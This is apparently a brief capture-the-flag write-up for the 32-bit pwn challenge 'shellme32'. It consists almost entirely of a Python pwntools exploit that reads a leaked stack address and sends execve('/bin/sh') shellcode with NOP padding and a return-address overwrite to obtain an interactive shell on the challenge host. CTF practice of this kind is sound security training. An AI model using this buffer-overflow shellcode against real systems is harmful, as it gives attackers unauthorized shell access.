shellme32 [pwn]

shellme32

One small step for hacker's, one giant leap for pwning kind.

Exploit

from pwn import *
import sys

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

c = remote("chal.tuctf.com", 30506)

leak = int(c.readuntil("> ").split("\n")[1], 0)
print "LEAK = %08x" % (leak)
buf = shellcode + "\x90"*(40-len(shellcode)) + struct.pack("<L", leak)

c.send(buf)
c.interactive()